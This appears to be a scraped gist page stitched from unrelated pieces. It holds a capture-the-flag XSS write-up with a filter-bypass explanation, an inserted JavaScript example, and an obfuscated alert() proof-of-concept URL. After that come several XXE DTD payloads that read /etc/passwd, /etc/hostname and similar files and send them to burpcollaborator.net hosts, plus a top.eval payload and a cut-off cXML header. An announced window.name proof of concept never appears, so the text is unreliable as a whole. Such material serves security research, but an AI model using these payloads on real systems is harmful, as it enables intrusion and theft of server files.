
I noticed that the color parameter can contain any characters, which is useful for getting out of the scope of the variable (color="), but it is limited: only 3 characters are reflected.

And because the value of the nickname parameter is reflected after the color, we can benefit from that by making everything after color a comment until we reach the value of the nickname parameter: color="/*&nickname=*/

Then we can use , to add our malicious code with window.location, but the application converts the word location to ( ͡° ͜ʖ ͡°). There is a way to bypass that by using an escaped Unicode sequence for a specific character in the word location, which JavaScript itself converts back to the original form (because (), %60 and some other characters are blocked, location is the better choice).

Unfortunately, double quotes, single quotes and %60 are blocked by the application, so we cannot use them to assign our host as a value to location. Fortunately, in JavaScript /Anything/ is treated as "/anything/" (a regex literal whose string form is its own source), so we assign our host to location that way.
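As an added example (not the gist author's code), the following JavaScript shows why a filter that only rewrites the word location can be bypassed with an identifier escape, and what a context-aware encoder for the reflected color and nickname values looks like instead. The naiveFilter, encodeForJsString and renderScript functions and every input are assumptions constructed for illustration.

```javascript
// Added example, not the gist author's code: why rewriting the word
// `location` does not protect a JavaScript string context, and what a
// context-aware encoder does instead. All inputs are constructed here.

// Naive filter modelled on the behaviour described above: it rewrites
// `location` and strips quotes, backticks and parentheses, nothing else.
function naiveFilter(value) {
  return String(value)
    .replace(/location/gi, "( ͡° ͜ʖ ͡°)")
    .replace(/["'`()]/g, "");
}

// JavaScript resolves Unicode escapes inside identifiers at parse time, so
// `\u006cocation` passes the filter untouched and still names `location`.
function identifierEscapeSurvivesFilter() {
  const input = "\\u006cocation";           // the 13-character source text
  const filtered = naiveFilter(input);
  const sandbox = { location: "resolved" }; // stand-in for window.location
  const resolved = new Function("o", "return o." + filtered)(sandbox);
  return { filtered, resolved };
}

// Correct fix: encode untrusted data for the JS string context, escaping
// every non-alphanumeric code point so no input can close the quote,
// open a comment, or contribute a backslash of its own.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/gu, (ch) => {
    const cp = ch.codePointAt(0);
    return cp < 0x100
      ? "\\x" + cp.toString(16).padStart(2, "0")
      : "\\u{" + cp.toString(16) + "}";
  });
}

// Hypothetical server-side template for the two reflected parameters.
function renderScript(color, nickname) {
  return (
    'var color="' + encodeForJsString(color) + '";\n' +
    'var nickname="' + encodeForJsString(nickname) + '";'
  );
}

// Evaluate the rendered script and return what the variables actually hold:
// with the encoder, the comment-breakout pair `/*` and `*/,...` stays data.
function roundTrip(color, nickname) {
  return new Function(renderScript(color, nickname) + "return [color, nickname];")();
}
```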

alert() POC:

https://challenge-0521.intigriti.io/captcha.php?c=[][[e%2b[]][0][5]%2b[e%2b[]][0][1]%2b[e%2b[]][0][25]%2b[e%2b[]][0][18]%2b[e%2b[]][0][26]%2b[e%2b[]][0][16]%2b[0[0]%2b[]][0][0]%2b[e%2b[]][0][5]%2b[e%2b[]][0][26]%2b[e%2b[]][0][14]%2b[e%2b[]][0][16]][[e%2b[]][0][5]%2b[e%2b[]][0][1]%2b[e%2b[]][0][25]%2b[e%2b[]][0][18]%2b[e%2b[]][0][26]%2b[e%2b[]][0][16]%2b[0[0]%2b[]][0][0]%2b[e%2b[]][0][5]%2b[e%2b[]][0][26]%2b[e%2b[]][0][14]%2b[e%2b[]][0][16]]`$${[%2b/3/%2b[]][0][1]%2b[e%2b[]][0][21]%2b[e%2b[]][0][22]%2b[e%2b[]][0][16]%2b[e%2b[]][0][26]%2b[[][[0[0]%2b[]][0][4]%2b[0[0]%2b[]][0][5]%2b[0[0]%2b[]][0][6]%2b[0[0]%2b[]][0][8]]%2b[]][0][13]%2b[[][[0[0]%2b[]][0][4]%2b[0[0]%2b[]][0][5]%2b[0[0]%2b[]][0][6]%2b[0[0]%2b[]][0][8]]%2b[]][0][14]}$```

Smuggle more data with window.name and execute it with eval POC:

@myuyu
myuyu / s.json
Created November 28, 2021 21:06
{
"swagger": "2.0",
@myuyu
myuyu / xx.dtd
Last active February 15, 2022 15:55
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://h1j4pfr9fkitxwq79j5wuzkaa1gy4n.burpcollaborator.net/POCCCCC?%file;'>">
%all;
@myuyu
myuyu / dddd.dtd
Last active February 15, 2022 16:01
<!ENTITY % file SYSTEM "file:///etc/debian_version">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://h1j4pfr9fkitxwq79j5wuzkaa1gy4n.burpcollaborator.net/POCCCCC?%file;'>">
%all;
@myuyu
myuyu / p.dtd
Last active February 24, 2022 07:26
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://w2zbslin91rjwptoh88kuo47jypzdo.burpcollaborator.net/?%file;'>">
%all;
<!ENTITY % file SYSTEM "file:///etc/issue">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://rjee7p9jxu03f68hrtn6c92ksbycm1.burpcollaborator.net?%file;'>">
%all;
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
@myuyu
myuyu / x.js
Last active April 12, 2024 14:25
top.eval('alert(document.domain)');
<?xml version="1.0" encoding="UTF-8"?>
<!--
For cXML license agreement information, please see
http://www.cxml.org/home/license.asp
$Id: //ariba/specs/cXML/Common.mod#16 $
-->
<!--
A few character entities the XML recommendation says should be defined